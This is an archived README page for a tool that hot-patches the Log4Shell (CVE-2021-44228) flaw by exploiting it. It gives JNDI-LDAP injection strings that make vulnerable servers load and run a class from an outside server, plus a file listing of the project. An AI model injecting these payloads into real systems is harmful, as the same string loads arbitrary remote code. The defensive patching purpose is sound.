关联漏洞
描述
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
介绍
# cve-2021-44228-qingteng-online-patch
## What is this
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
## How to use
Inject the following code to anywhere likely vulnerable to CVE-2021-44228,
```
${jndi:ldap://your-own-server/patch}
```
To prevent MITM attack during the patch process, the following payload is recommended, but with less compatibility for older versions of Java,
```
${jndi:ldap://your-own-server/any_string_except_patch}
```
## Run your own server
1. Download the latest [releases](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch/releases)
2. Specify system environment variables ```LOG4J_HOTFIX_HTTP_PATH``` and ```LOG4J_HOTFIX_HTTPS_PATH``` if you want to host Hotfix.class on your own server
## Build
Please note Hotfix.java should be compiled with JDK6 for maximum compatibility.
文件快照
[4.0K] /data/pocs/daf3e42394a1873fe0c28e0321b3a9602265560d
├── [ 333] build.gradle
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 58K] gradle-wrapper.jar
│ └── [ 200] gradle-wrapper.properties
├── [5.6K] gradlew
├── [2.6K] gradlew.bat
├── [ 11K] LICENSE
├── [ 850] README.md
├── [ 35] settings.gradle
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
├── [ 15K] HotfixGenerator.java
├── [3.3K] Hotfix.java
└── [3.8K] LDAPServer.java
5 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。